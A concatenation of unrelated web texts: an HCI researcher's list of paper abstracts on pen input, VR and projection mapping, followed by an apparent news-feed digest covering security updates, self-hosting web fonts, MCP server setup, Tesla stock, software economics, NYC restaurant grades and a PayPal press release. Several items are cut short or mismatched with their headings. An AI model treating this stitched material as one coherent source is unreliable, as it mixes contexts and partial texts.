Digital pen input devices based on absolute pen position sensing, such as a Wacom pen, support high-fidelity pen input. However, they require specialized sensing surfaces like drawing tablets, which can have a large desk footprint, constrain the possible input area, and limit mobility. In contrast, digital pens with integrated relative sensing enable mobile use on passive surfaces, but suffer from motion artifacts or require surface contact at all times, deviating from natural pen affordances. We present OptiBasePen, a device for mobile pen input on ordinary surfaces. Our prototype consists of two parts: the ``base'' on which the hand rests and the pen for fine-grained input. The base features a high-precision mouse sensor to sense its own relative motion, and two infrared image sensors to track the absolute pen tip position within the base's frame of reference. This enables pen input on ordinary surfaces without external cameras while also avoiding drift from pen micro-movements. In this work, we present our prototype as well as the general base+pen concept, which combines relative and absolute sensing.
ACM UIST 2023
Andreas Fender
, Derek Alexander Witzig, Max Moebus, Christian Holz
When learning to play an instrument, it is crucial for the learner's muscles to be in a relaxed state when practicing. Identifying, which parts of a song lead to increased muscle tension requires self-awareness during an already cognitively demanding task. In this work, we investigate unobtrusive pressure sensing for estimating muscle tension while practicing songs with the guitar. First, we collected data from twelve guitarists. Our apparatus consisted of three pressure sensors (one on each side of the guitar pick and one on the guitar neck) to determine the sensor that is most suitable for automatically estimating muscle tension. Second, we extracted features from the pressure time series that are indicative of muscle tension. Third, we present the hardware and software design of our PressurePick prototype, which is directly informed by the data collection and subsequent analysis.
ACM CHI 2023
Andreas Fender
, Thomas Roberts, Tiffany Luong, Christian Holz
Digital painting interfaces require an input fidelity that preserves the artistic expression of the user. Drawing tablets allow for precise and low-latency sensing of pen motions and other parameters like pressure to convert them to fully digitized strokes. A drawback is that those interfaces are rigid. While soft brushes can be simulated in software, the haptic sensation of the rigid pen input device is different compared to using a soft wet brush on paper. We present InfinitePaint, a system that supports digital painting in Virtual Reality on real paper with a real wet brush. We use special paper that turns black wherever it comes into contact with water and turns blank again upon drying. A single camera captures those temporary strokes and digitizes them while applying properties like color or other digital effects. We tested our system with artists and compared the subjective experience with a drawing tablet.
ACM UIST 2022
Guy Luethi,
Andreas Fender
, Christian Holz
We present DeltaPen, a pen device that operates on passive surfaces without the need for external tracking systems or active sensing surfaces. DeltaPen integrates two adjacent lens-less optical flow sensors at its tip, from which it reconstructs accurate directional motion as well as yaw rotation. DeltaPen also supports tilt interaction using a built-in inertial sensor. A pressure sensor and high-fidelity haptic actuator complements our pen device while retaining a compact form factor that supports mobile use on uninstrumented surfaces. We present a processing pipeline that reliably extracts fine-grained pen translations and rotations from the two optical flow sensors. To asses the accuracy of our translation and angle estimation pipeline, we conducted a technical evaluation in which we compared our approach with ground-truth measurements of participants' pen movements during typical pen interactions. We conclude with several example applications that leverage our device's capabilities. Taken together, we demonstrate novel input dimensions with DeltaPen that have so far only existed in systems that require active sensing surfaces or external tracking.
ACM CHI 2022
(Best paper award)
Andreas Fender
, Christian Holz
Mixed Reality is gaining interest as a platform for collaboration and focused work to a point where it may supersede current office settings in future workplaces. At the same time, we expect that interaction with physical objects and face-to-face communication will remain crucial for future work environments, which is a particular challenge in fully immersive Virtual Reality. In this work, we reconcile those requirements through a user's individual Asynchronous Reality, which enables seamless physical interaction across time. When a user is unavailable, e.g., focused on a task or in a call, our approach captures co-located or remote physical events in real-time, constructs a causality graph of co-dependent events, and lets immersed users revisit them at a suitable time in a causally accurate way. Enabled by our system AsyncReality, we present a workplace scenario that includes walk-in interruptions during a person's focused work, physical deliveries, and transient spoken messages. We then generalize our approach to a use-case agnostic concept and system architecture. We conclude by discussing the implications of an Asynchronous Reality for future offices.
ACM CHI 2021
Andreas Fender
, Diego Martinez Plasencia, Sriram Subramanian
Acoustic levitation is gaining popularity as an approach to create physicalized mid-air content by levitating different types of levitation primitives. Such primitives can be independent particles or particles that are physically connected via threads or pieces of cloth to form shapes in mid-air. However, initialization (i.e., placement of such primitives in their mid-air target locations) currently relies on either manual placement or specialized ad-hoc implementations, which limits their practical usage. We present ArticuLev, an integrated pipeline that deals with the identification, assembly and mid-air placement of levitated shape primitives. We designed ArticuLev with the physical properties of commonly used levitation primitives in mind. It enables experiences that seamlessly combine different primitives into meaningful structures (including fully articulated animated shapes) and supports various levitation display approaches (e.g., particles moving at high speed). In this paper, we describe our pipeline and demonstrate it with heterogeneous combinations of levitation primitives.
Storyboard of video by Christian Holz
IEEE VR 2021
Manuel Meier, Paul Streli,
Andreas Fender
, Christian Holz
In this paper, we bring rapid touch interaction on surfaces to Virtual Reality. Current systems capture input with cameras, for which touch detection remains a core challenge, often leaving free-hand mid-air interaction and controllers as viable alternatives for input. We present TapID, a wrist-based system that complements optical hand tracking with inertial sensing to detect touch events on surfaces - the input modality that users have grown used to on phones and tablets. TapID embeds a pair of inertial sensors in a flexible strap, one at either side of the wrist; from the combination of registered signals, TapID reliably detects surface touch events and, more importantly, identifies the finger used for touch, which we fuse with optically tracked hand poses to trigger input in VR. We evaluated TapID in a series of user studies on event-detection accuracy (F1 = 0.997) and finger-identification accuracy (within-user: F1 = 0.93; cross-user: F1 = 0.91 after 10 refinement taps and F1 = 0.87 with no refinement) in a seated table scenario. We conclude with a series of applications that complement hand tracking with touch input, including UI control, rapid typing, and surface gestures.
Video edited by Hugo Romat
IEEE VR 2021
Hugo Romat,
Andreas Fender
, Manuel Meier, Christian Holz
Digital pen interaction has become a first-class input modality for precision tasks such as writing, annotating, and drawing. In Virtual Reality, however, input is largely detected using cameras which does not nearly reach the fidelity we achieve with analog handwriting or the spatial resolution required to enable fine-grained on-surface input.
We present FlashPen, a digital pen for VR whose sensing principle affords accurately digitizing hand-writing and fine-grained 2D input for manipulation. We combine absolute camera tracking with relative motion sensing from an optical flow sensor. In this paper, we describe our prototype, a user study and several application prototypes.
ACM ISS 2019
(Best application paper award)
Joao Belo,
Andreas Fender
, Tiare Feuchtner, Kaj Groenbaek
We present a digital assistance approach for applied metrology on near-symmetrical objects. In manufacturing, systematically measuring products for quality assurance is often a manual task, where the primary challenge for the workers lies in accurately identifying positions to measure and correctly documenting these measurements. This paper focuses on a use-case, which involves metrology of small near-symmetrical objects, such as LEGO bricks. We aim to support this task through situated visual measurement guides. Aligning these guides poses a major challenge, since fine grained details, such as embossed logos, serve as the only feature by which to retrieve an object's unique orientation. We present a two-step approach, which consists of (1) locating and orienting the object based on its shape, and then (2) disambiguating the object's rotational symmetry based on small visual features. We apply and compare different deep learning approaches and discuss our guidance system in the context of our use case.
ACM ISS 2019
Andreas Fender
, Joerg Mueller
We present SpaceState, a system for designing spatial user interfaces that react to changes of the physical layout of a room. SpaceState uses depth cameras to measure the physical environment and allows designers to interactively define global and local states of the room. After designers defined states, SpaceState can identify the current state of the physical environment in real-time. This allows applications to adapt the content to room states and to react to transitions between states. Other scenarios include analysis and optimizations of work flows in physical environments. We demonstrate SpaceState by showcasing various example states and interactions. Lastly, we implemented an example application: A projection mapping based tele-presence application, which projects a remote user in the local physical space according to the current layout of the space.
ACM ISS 2018
Andreas Fender
, Joerg Mueller
We present Velt, a flexible framework for multi RGB-D camera systems. Velt supports modular real-time streaming and processing of multiple RGB, depth and skeleton streams in a camera network. RGB-D data from multiple devices can be combined into 3D data like point clouds. Furthermore, we present an integrated GUI, which enables viewing and controlling all streams, as well as debugging and profiling performance. The node-based GUI provides access to everything from high level parameters like frame rate to low level properties of each individual device. Velt supports modular preprocessing operations like downsampling and cropping of streaming data. Furthermore, streams can be recorded and played back. This paper presents the architecture and implementation of Velt.
ACM CHI 2018
Andreas Fender
, Philipp Herholz, Marc Alexa, Joerg Mueller
We present OptiSpace, a system for the automated placement of perspectively corrected projection mapping content. We analyze the geometry of physical surfaces and the viewing behavior of users over time using depth cameras. Our system measures user view behavior and simulates a virtual projection mapping scene users would see if content were placed in a particular way. OptiSpace evaluates the simulated scene according to perceptual criteria, including visibility and visual quality of virtual content. Finally, based on these evaluations, it optimizes content placement, using a two-phase procedure involving adaptive sampling and the covariance matrix adaptation algorithm. With our proposed architecture, projection mapping applications are developed without any knowledge of the physical layouts of the target environments. Applications can be deployed in different uncontrolled environments, such as living rooms and office spaces.
ACM UIST 2017
Andreas Fender
, David Lindlbauer, Philipp Herholz, Marc Alexa, Joerg Mueller
We present HeatSpace, a system that records and empirically analyzes user behavior in a space and automatically suggests positions and sizes for new displays. The system uses depth cameras to capture 3D geometry and users' perspectives over time. To derive possible display placements, it calculates volumetric heatmaps describing geometric persistence and planarity of structures inside the space. It evaluates visibility of display poses by calculating a volumetric heatmap describing occlusions, position within users' field of view, and viewing angle. Optimal display size is calculated through a heatmap of average viewing distance. Based on the heatmaps and user constraints we sample the space of valid display placements and jointly optimize their positions. This can be useful when installing displays in multi-display environments such as meeting rooms, offices, and train stations.
ACM ISS 2017
(Best application paper award)
Andreas Fender
, Hrvoje Benko, Andy Wilson
MeetAlive combines multiple depth cameras and projectors to create a room-scale omni-directional display surface designed to support collaborative face-to-face group meetings. With MeetAlive, all participants may simultaneously display and share content from their personal laptop wirelessly anywhere in the room. MeetAlive gives each participant complete control over displayed content in the room. This is achieved by a perspective corrected mouse cursor that transcends the boundary of the laptop screen to position, resize, and edit their own and others' shared content. MeetAlive includes features to replicate content views to ensure that all participants may see the actions of other participants even as they are seated around a conference table. We report on observing six groups of three participants who worked on a collaborative task with minimal assistance. Participants' feedback highlighted the value of MeetAlive features for multi-user engagement in meetings involving brainstorming and content creation.
Video: shot and edited by Ines Ben Said
ACM SUI 2015
Andreas Fender
, Joerg Mueller, David Lindlbauer
We present Creature Teacher, a performance-based animation system for creating cyclic movements. Users directly manipulate body parts of a virtual character by using their hands. Creature Teacher's generic approach makes it possible to animate rigged 3D models with nearly arbitrary topology (e.g., non-humanoid) without requiring specialized user-to-character mappings or predefined movements. We use a bimanual interaction paradigm, allowing users to select parts of the model with one hand and manipulate them with the other hand. Cyclic movements of body parts during manipulation are detected and repeatedly played back - also while animating other body parts. Our approach of taking cyclic movements as an input makes mode switching between recording and playback obsolete and allows for fast and seamless creation of animations. We show that novice users with no animation background were able to create expressive cyclic animations for initially static virtual 3D creatures.
Collaborations and supervisions
TVCG 2024
Lara Lenz,
Andreas Fender
, Julia Chatain, Christian Holz
Asynchronous digital communication is a widely applied and well-known form of information exchange. Most pieces of technology make use of some variation of asynchronous communication systems, be it messaging or email applications. This allows recipients to process digital messages immediately (synchronous) or whenever they have time (asynchronous), meaning that purely digital interruptions can be mitigated easily. Mixed Reality systems have the potential to not only handle digital interruptions but also interruptions in physical space, e.g., caused by co-workers in workspaces or learning environments. However, the benefits of such systems previously remained untested in the context of Mixed Reality. We conducted a user study (N=26) to investigate the impact that the timing of task delivery has on the participants' performance, workflow, and emotional state. Participants had to perform several cognitively demanding tasks in a Mixed Reality workspace. Inside the virtual workspace, we simulated in-person task delivery either during tasks (i.e., interrupting the participant) or between tasks (i.e., delaying the interruption). Our results show that delaying interruptions has a significant impact on subjective metrics like the perceived performance and workload.
TVCG 2023
Tiffany Luong, Yi Fei Cheng, Max Moebus,
Andreas Fender
, Christian Holz
Virtual Reality (VR) systems have traditionally required users to operate the user interface with controllers in mid-air. More recent VR systems, however, integrate cameras to track the headset's position inside the environment as well as the user's hands when possible. This allows users to directly interact with virtual content in mid-air just by reaching out, thus discarding the need for hand-held physical controllers. However, it is unclear which of these two modalities—controller-based or free-hand interaction—is more suitable for efficient input, accurate interaction, and long-term use under reliable tracking conditions. While interacting with hand-held controllers introduces weight, it also requires less finger movement to invoke actions (e.g., pressing a button) and allows users to hold on to a physical object during virtual interaction. In this paper, we investigate the effect of VR input modality (controller vs. free-hand interaction) on physical exertion, agency, task performance, and motor behavior across two mid-air interaction techniques (touch, raycast) and tasks (selection, trajectory-tracing). Participants reported less physical exertion, felt more in control, and were faster and more accurate when using VR controllers compared to free-hand interaction in the raycast setting. Regarding personal preference, participants chose VR controllers for raycast but free-hand interaction for mid-air touch. Our correlation analysis revealed that participants' physical exertion increased with selection speed, quantity of arm motion, variation in motion speed, and bad postures, following ergonomics metrics such as consumed endurance and rapid upper limb assessment. We also found a negative correlation between physical exertion and the participant's sense of agency, and between physical exertion and task accuracy.
IEEE ISMAR 2022
Yi Fei Cheng, Tiffany Luong,
Andreas Fender
, Paul Streli, Christian Holz
Real-world work-spaces typically revolve around tables, which enable knowledge workers to comfortably perform tasks over an extended period of time during productivity tasks. Tables afford more ergonomic postures and provide opportunities for rest, which raises the question of whether they may also benefit prolonged interaction in Virtual Reality (VR). In this paper, we investigate the effects of tabletop surface presence in situated VR settings on task performance, behavior, and subjective experience. In an empirical study, 24 participants performed two tasks (selection, docking) on virtual interfaces placed at two distances and two orientations. Our results show that a physical tabletop inside VR improves comfort, agency, and task performance while decreasing physical exertion and strain of the neck, shoulder, elbow, and wrist, assessed through objective metrics and subjective reporting. Notably, we found that these benefits apply when the UI is placed on and aligned with the table itself as well as when it is positioned vertically in mid-air above it. Our experiment therefore provides empirical evidence for integrating physical table surfaces into VR scenarios to enable and support prolonged interaction. We conclude by discussing the effective usage of surfaces in situated VR experiences and provide initial guidelines.
Video edited by Paul Streli
ECCV 2022
Jiaxi Jiang, Paul Streli, Huajian Qiu,
Andreas Fender
, Larissa Laich, Patrick Snape, Christian Holz
Today's Mixed Reality head-mounted displays track the user's head pose in world space as well as the user's hands for interaction in both Augmented Reality and Virtual Reality scenarios. While this is adequate to support user input, it unfortunately limits users' virtual representations to just their upper bodies. Current systems thus resort to floating avatars, whose limitation is particularly evident in collaborative settings. To estimate full-body poses from the sparse input sources, prior work has incorporated additional trackers and sensors at the pelvis or lower body, which increases setup complexity and limits practical application in mobile settings. In this paper, we present AvatarPoser, the first learning-based method that predicts full-body poses in world coordinates using only motion input from the user's head and hands. Our method builds on a Transformer encoder to extract deep features from the input signals and decouples global motion from the learned local joint orientations to guide pose estimation. To obtain accurate full-body motions that resemble motion capture animations, we refine the arm joints' positions using an optimization routine with inverse kinematics to match the original tracking input. In our evaluation, AvatarPoser achieved new state-of-the-art results in evaluations on large motion capture datasets (AMASS). At the same time, our method's inference speed supports real-time operation, providing a practical interface to support holistic avatar control and representation for Metaverse applications.
Video co-edited with Paul Streli
ACM CHI 2022
Paul Streli, Jiaxi Jiang,
Andreas Fender
, Manuel Meier, Hugo Romat, Christian Holz
Despite the advent of touchscreens, typing on physical keyboards remains most efficient for entering text, because users can leverage all fingers across a full-size keyboard for convenient typing. As users increasingly type on the go, text input on mobile and wearable devices has had to compromise on full-size typing. In this paper, we present TapType, a mobile text entry system for full-size typing on passive surfaces—without an actual keyboard. From the inertial sensors inside a band on either wrist, TapType decodes and relates surface taps to a traditional QWERTY keyboard layout. The key novelty of our method is to predict the most likely character sequences by fusing the finger probabilities from our Bayesian neural network classifier with the characters’ prior probabilities from an n-gram language model. In our online evaluation, participants on average typed 19 words per minute with a character error rate of 0.6% after 30 minutes of training. Expert typists thereby consistently achieved more than 25 WPM at a similar error rate. We demonstrate applications of TapType in mobile use around smartphones and tablets, as a complement to interaction in situated Mixed Reality outside visual control, and as an eyes-free mobile text input method using an audio feedback-only interface.
Video fully created by Mohamed Kari
IEEE ISMAR 2021
Mohamed Kari, Tobias Grosse-Puppendahl, Luis Falconeri Coelho,
Andreas Fender
, David Bethge, Reinhard Schütte, Christian Holz
Despite the advances in machine perception, semantic scene understanding is still a limiting factor in mixed reality scene composition. In this paper, we present TransforMR, a video see-through mixed reality system for mobile devices that performs 3D-pose-aware object substitution to create meaningful mixed reality scenes. In real-time and for previously unseen and unprepared real-world environments, TransforMR composes mixed reality scenes so that virtual objects assume behavioral and environment-contextual properties of replaced real-world objects. This yields meaningful, coherent, and humaninterpretable scenes, not yet demonstrated by today’s augmentation techniques. TransforMR creates these experiences through our novel pose-aware object substitution method building on different 3D object pose estimators, instance segmentation, video inpainting, and pose-aware object rendering. TransforMR is designed for use in the real-world, supporting the substitution of humans and vehicles in everyday scenes, and runs on mobile devices using just their monocular RGB camera feed as input. We evaluated TransforMR with eight participants in an uncontrolled city environment employing different transformation themes. Applications of TransforMR include real-time character animation analogous to motion capturing in professional film making, however without the need for preparation of either the scene or the actor, as well as narrative-driven experiences that allow users to explore fictional parallel universes in mixed reality.
Video fully created by Soeren Qvist Jensen
ACM CHI 2018
Soeren Qvist Jensen,
Andreas Fender
, Joerg Mueller
We present Inpher, a virtual reality system for setting physical properties of virtual objects using mid-air interaction. Users simply grasp virtual objects and mimic their desired physical movement. The physical properties required to fulfill that movement will then be inferred directly from that motion. We provide a 3D user interface that does not require users to have an abstract model of physical properties. Our approach leverages users' real world experiences with physics. We conducted a bodystorming to investigate users' mental model of physics. Based on our iterative design process, we implemented techniques for inferring mass, bounciness and friction. We conducted a case study with 15 participants with varying levels of physics education. The results indicate that users are capable of demonstrating the required interactions and achieve satisfying results.
Security updates for Monday
Linux Weekly News
lwn.net
2025-09-15 15:36:11
Security updates have been issued by AlmaLinux (cups, kernel, and mysql-selinux and mysql8.4), Debian (cjson, jetty9, and shibboleth-sp), Fedora (bustle, cef, checkpointctl, chromium, civetweb, cups, forgejo, jupyterlab, kernel, libsixel, linenoise, maturin, niri, perl-Cpanel-JSON-XS, python-uv-buil...
A common place to get a web font is
Google Fonts
If you want to use a font from Google Fonts, you should not just paste the code they give you.
Instead, you should download the font files and put them on your webserver.
If you want a font used it this website(like Noto Sans and Fira Code), copy the relevant files from here
here
and skip steps 0 and 1.
THIS IS NOT LEGAL ADVICE
I AM NOT YOUR LAWYER
ENSURE THAT YOUR USE OF THE FONT WILL COMPLY WITH THE LICENSE
Select "Get embed code" (don't paste the code it gives you).
Select which options you want included.
In the HTML code it gives you, it should have something like
<link href="https://fonts.googleapis.com/css2?family=Fira+Code&display=swap" rel="stylesheet">
.
Download the file using the URL after the href (
https://fonts.googleapis.com/css2?family=Fira+Code&display=swap
in this case).
Download each font referenced in the CSS file you just downloaded.
Put all of the font you just downloaded in a folder, ideally with a something that will change each update and a long cache time (like /Assets/Fira/Code/2025-8-13/).
Copy the CSS file into that folder.
Change the CSS to use relative links.
(eg change
src: url(https://fonts.gstatic.com/s/firacode/v26/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_D1sJVD7Ng.woff2) format('woff2');
into
src: url(uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_D1sJVD7Ng.woff2) format('woff2');
)
Paste the license of the font into a file. To find the license of a google font do:
Add a link to the font LICENSE and
ensure that your usage of the font follows the license of the font
.
If you can't understand these steps,
see how it was done here.
Atom Feed
To contact Velocifyer, email velocifyer at veloicfyer dot com with the "i" and "C" swapped in the host.
The PGP Certificate is
1BA0 FC4B 80E0 F21B 0269 8CEE 634E BF87 40C7 48BE
Except for the favicon and javascript and the fonts, this is licensed CC-BY-SA 4.0 𝕍𝕖𝕝𝕠𝕔𝕚𝕗𝕪𝕖𝕣.
One of the fonts used on this website is Fira Code, which uses
this
license.
One of the fonts used on this website is Noto Sans, which uses
this license
.
This blog is available on
Codeberg
. Make an issue or merge request if it would be useful.
View warrant canaries
here
.
Show HN: MCP Server Installation Instructions Generator
Generate MCP Server Installation Instructions for Cursor, Visual Studio Code, Claude Code, Claude Desktop, Windsurf, ChatGPT, Gemini CLI and more
How To Install a Remote MCP server?
Instructing users on how to install an MCP server is hard, because
configuration is different for each client. If this has been your
experience hosting an MCP server for your product, this site is for
you! Just enter your server URL below and let us generate instructions
for the most widely used clients, ready for you to copy and paste into
your product's readme or documentation.
How do I install a remote MCP server on Claude Code?
To install a remote MCP server on Claude Code:
Open a terminal in Claude Code
Run the command:
claude mcp add --transport http [server-name]
[server-url]
Replace
[server-name]
with your desired name and
[server-url]
with the MCP server URL
Use the
/mcp
command within Claude Code to verify
the server is connected
How do I install a remote MCP server on Cursor?
To install a remote MCP server on Cursor:
Locate your
mcp.json
configuration file
Add your server configuration to the
mcpServers
object with the server URL
Save the file and restart Cursor to apply the changes
Alternatively, use the direct installation link if provided
by the server
How do I install a remote MCP server on Claude Desktop?
To install a remote MCP server on Claude Desktop:
Open Claude Desktop application
Navigate to Settings → Connectors → Add Custom Connector
Enter a name for your server
Paste the remote MCP server URL
Click Add to complete the installation
How do I install a remote MCP server on VS Code?
To install a remote MCP server on VS Code:
Open a terminal and run:
code --add-mcp '{"type":"http","name":"[server-name]","url":"[server-url]"}'
Open the
.vscode/mcp.json
file in VS Code
Click "Start server" to activate the connection
Alternatively, use the installation link button if available
How do I install a remote MCP server on Windsurf?
To install a remote MCP server on Windsurf:
Open your Windsurf MCP configuration file
Add the server configuration to the
mcpServers
object
Use
serverUrl
as the key for the remote URL
Save the configuration and restart Windsurf
How do I install a remote MCP server on ChatGPT?
To install a remote MCP server on ChatGPT:
Navigate to Settings → Connectors (requires admin
permissions in Team/Enterprise workspaces)
Add a custom connector with your server URL
The connector will be available in Composer → Deep research
tool
You may need to add the server as a source
Note: Connectors can only be used with Deep Research
How do I install a remote MCP server on Gemini CLI?
To install a remote MCP server on Gemini CLI:
Locate your Gemini CLI configuration file at
~/.gemini/settings.json
Add your server to the
mcpServers
object with
httpUrl
key
Include headers with
Accept: application/json, text/event-stream
Save the file and restart Gemini CLI
What is a remote MCP server?
A remote MCP (Model Context Protocol) server is a web-based
service that provides additional capabilities to AI
assistants. Unlike local MCP servers that run on your machine,
remote servers are hosted on the internet and accessed via
HTTPS. Remote MCP servers can also implement
MCP Server authentication
for personalized tools and context.
Can I contribute to the MCP Server installation instructions
generator?
Show HN: Daffodil – Open-Source Ecommerce Framework to connect to any platform
Read through our
contributing guidelines
to learn about our submission process, coding rules, and more.
Want to Help?
Want to report a bug, contribute some code, or improve the documentation? Excellent! Read up on our guidelines for
contributing
and then check out one of our issues labeled as
good first issue
or
good first challenge
.
Note:
About the
checkout
package, it is currently a legacy package; there is no reason to use it. However, the
checkout
package eventually may be filled with extracts from the
cart
and
order
packages.
Think Daffodil is the bees-knees? Give our repo a star ⭐ ❤️.
Elon Musk buys nearly $1bn in Tesla stock in push for more control
Guardian
www.theguardian.com
2025-09-15 15:15:18
Tesla shares rose by more than 8% after news of CEO’s transactions, a week after he was offered $1tn pay package Elon Musk, the Tesla CEO, has purchased nearly $1bn worth of the electric-vehicle maker’s stock, a regulatory filing showed, reinforcing Musk’s push for greater control over Tesla. Tesla ...
Elon Musk
, the
Tesla
CEO, has purchased nearly $1bn worth of the electric-vehicle maker’s stock, a regulatory filing showed, reinforcing Musk’s push for greater control over Tesla.
Tesla shares jumped more than 8% in premarket trading on Monday following the news.
Tesla is racing to meet its ambitious targets on
robotaxis
, artificial intelligence and robotics as it looks to pivot from an EV maker to a tech leader. As of December, Musk held a roughly 13% stake, according to LSEG data.
Musk disclosed buying 2.57m shares in open-market transactions on Friday, paying between $372.37 and $396.54 per share, according to the filing.
Tesla shares jumped more than 7% on Friday, extending solid gains from the previous session. The stock, which is down about 2% this year, is on track to record a third straight session of gains if premarket moves are sustained.
Musk has consistently demanded a bigger stake and increased voting power at Tesla, having also threatened to build AI and robotics products outside of Tesla if he cannot get 25% voting power.
Earlier this month, Tesla’s board
proposed
a trillion-dollar compensation plan for Musk, in a huge vote of confidence for Musk’s leadership from the board, even as the company stumbles amid heated competition and flailing EV demand.
On Friday, board chair Robyn Denholm dismissed concerns that Musk’s political activity had hurt sales and said the billionaire was back “front and center” at the company after
several months
at the White House.
Musk’s
political activity
and
public clashes
with Donald Trump had stirred worries among investors about distractions and potential lost sales, weighing on the company’s stock this year.
The genies are out of the bottle. Let’s take as a given that augmented coding is steadily reducing the cost, skill barriers, and time needed to develop software. (Interesting debate to be had—another day.)
Will this lead to fewer programmers or more programmers?
Economics gives us two contradictory answers simultaneously.
Substitution
. The substitution effect says we'll need fewer programmers—machines are replacing human labor.
Jevons’.
Jevons’ paradox predicts that when something becomes cheaper, demand
increases
as the cheaper good is economically viable in a wider variety of cases.
Both can't be right. Or can they?
Another way of looking at the contradiction—if programs are cheaper to write today than they were yesterday, then we should be more likely to write them today.
But
, if programs are going to be cheaper to write tomorrow, then why not just wait until the cost goes to zero? This is the deflationary spiral, the urge to defer investment leading to less economic activity leading to lower prices leading to the urge to defer investment.
What’s a software executive to do? A programmer? What we’d like is a strategy that:
Let’s us act today.
Doesn’t rely on information that just not available.
Leads to reasonable outcomes regardless of which way the rock tumbles.
Traditional deflation is destructive because it reflects economic weakness—falling demand, broken confidence, shrinking money supply. Programming deflation is different. It's driven by genuine productivity gains. AI isn't just redistributing the same pie; it's making the pie-making process fundamentally cheaper.
This creates some interesting paradoxes:
Delay vs. Experiment
: Yes, you might wait for better tools. But when experimentation costs approach zero, the urge to try something
right now
often wins. How many of us have spun up a quick prototype just because we could?
Quality Bifurcation
: Cheap code floods the market. Most of it is terrible. But the gap between commodity code and carefully crafted software widens. The middle disappears.
Value Migration
: Writing code becomes like typing—a basic skill, not a career. Value moves to understanding what to build, how systems fit together, and navigating the complexity of infinite cheap software pieces.
Here's where programming deflation breaks the traditional model entirely. In economic deflation, the spiral is self-reinforcing and destructive. In programming deflation, cheaper tools might actually
accelerate
innovation—when programming accelerates programming. Better tools. Better models. The reinforcing loop kicks in.
Every small business becomes a software company. Every individual becomes a developer. The cost of "what if we tried..." approaches zero.
Publishing was expensive in 1995, exclusive. Then it became free. Did we get less publishing? Quite the opposite. We got an explosion of content, most of it terrible, some of it revolutionary.
So what do we do while we're in this deflation? A few thoughts:
Embrace the Commodity
: Use the cheap tools. Build the obvious stuff with AI. Save your energy for the hard problems.
Focus on Integration
: The bottleneck isn't writing code anymore. It's making all these cheap software pieces work together coherently.
Develop Taste
: When anyone can build anything, knowing what's worth building becomes the skill.
Think in Systems
: Individual programs are commoditized. Complex, adaptive systems are not.
In a world of abundant cheap code, what becomes scarce? Understanding. Judgment. The ability to see how pieces fit together. The wisdom to know what not to build.
We're not just experiencing technological change. We're watching the basic economics of software development transform in real time. The question isn't whether programming deflation will happen—it's already happening. The question is how we adapt to abundance.
Here's the beautiful thing about focusing on understanding, integration, and judgment: these skills matter whether we end up with fewer programmers or more programmers. If automation replaces routine coding, these human skills become the differentiator. If cheap tools create an explosion of new programmers, these skills separate signal from noise even more than they did a year ago.
Cultivating judgement also improves one’s competitive position
vis a vis
those who use the tools simply to churn out the same features faster.
Don’t bother predicting which future we'll get. Build capabilities that thrive in either scenario.
Interested in a private, custom talk for your organization on the effects of AI on software development & how y’all can navigate them? Contact me! I still have some slots open in the last quarter of the year.
15 Years After Their Creation, Do NYC Restaurant Grades Still Matter to Diners?
hellgate
hellgatenyc.com
2025-09-15 15:06:00
The number of "A" grades are slipping citywide—not that patrons we spoke to really care....
On July 15, Carbone, the world-famous Italian restaurant graced by
Kardashians
,
A-list rappers
,
models
,
It Girls
, and
the Obamas
, whose popularity
birthed a private dining club
and
outposts
in Miami, Vegas, Doha, and Riyadh, fell short by one metric: The New York City Department of Health and Mental Hygiene's inspection process. The restaurant that launched a thousand Instagram posts received a "B," along with an additional fine for failing to display its letter grade card, as restaurants have been legally required to do for the past 15 years.
The New York Post trumpeted the subpar grade in an August 28 article,
headlined
"Carbone hid 'B' health rating—with latest DOH inspection finding dirty dishes, food left above safe temps."
Post readers reacted with disdain in the comments section: "They will be empty after this B rating. Someone is asleep at the helm," one predicted.
But on a drizzly Thursday night outside of Carbone, a month and a half after their last DOH inspection but less than a week after the scathing Post article, we couldn't find anyone who thought the lower grade mattered. (We didn't see the letter grade displayed, either.)
PayPal Ushers in a New Era of Peer-to-Peer Payments, Reimagining How Money Moves to Anyone, Anywhere
Send and receive money as easily as sending a text, across apps, borders, and currencies
, /
PRNewswire
/ -- On the heels of the PayPal World announcement, a global platform connecting the world's largest digital payment systems and wallets, PayPal today introduced
PayPal links
, a new way to send and receive money through a personalized, one-time link that can be shared in any conversation.
PayPal users in the U.S. can begin creating personalized payment links today, with international expansion to the UK,
Italy
, and other markets starting later this month. By making payments this simple and universal, PayPal links helps drive new customer acquisition and brings more users into the PayPal ecosystem.
The peer-to-peer (P2P) experience is about to go even further.
Crypto
will soon be directly integrated into PayPal's new P2P payment flow in the app. This will make it more convenient for PayPal users in the U.S. to send
Bitcoin
,
Ethereum
, PYUSD, and more, to PayPal, Venmo, as well a rapidly growing number of digital wallets across the world that support
crypto
and stablecoins.
Expanding what people can do with PayPal also comes with reassurance around how personal payments are handled. As always, friends-and-family transfers through Venmo and PayPal are exempt from 1099-K reporting. Users won't receive tax forms for gifts, reimbursements, or splitting expenses, helping ensure that personal payments stay personal.
"For 25 years, PayPal has revolutionized how money moves between people. Now, we're taking the next major step," said
Diego Scotti
, General Manager, Consumer Group at PayPal. "Whether you're texting, messaging, or emailing, now your money follows your conversations. Combined with PayPal World, it's an unbeatable value proposition, showing up where people connect, making it effortless to pay your friends and family, no matter where they are or what app they're using."
P2P is a cornerstone of PayPal's consumer experience, driving engagement and bringing more users into the ecosystem. P2P and other consumer total payment volume saw solid growth in the second quarter, increasing 10% year-over-year as the company focused on improving the experience and increasing user discoverability to make it easier than ever to move money globally. Plus, Venmo saw its highest TPV growth in three years. With PayPal World unlocking seamless interoperability, P2P is poised for even greater momentum in the future as PayPal and Venmo connect to billions of wallets worldwide.
How PayPal links work:
Create a personalized link
– Open the PayPal app, enter the details of your payment or request, and generate a unique, one-time link to share.
Always the right person
– Each link is private, one-time use, and created for a specific transaction.
Drop it anywhere
– Send your link in a text, DM, email, or chat. Add a note, emoji, or payment note.
Manage payment activity:
Unclaimed links expire after 10 days. Users can send a reminder or even cancel the payment or request before the link is claimed with the PayPal app.
Tap and done
– The recipient taps the link and either completes or accepts the payment within the PayPal App with their PayPal account.
Funds are instant
– the recipient will get immediate access to their funds with a PayPal Balance account once accepted.
About PayPal
PayPal has been revolutionizing commerce globally for more than 25 years. Creating innovative experiences that make moving money, selling, and shopping simple, personalized, and secure, PayPal empowers consumers and businesses in approximately 200 markets to join and thrive in the global economy. For more information, visit
https://www.paypal.com
,
https://about.pypl.com/
and
https://investor.pypl.com/
.
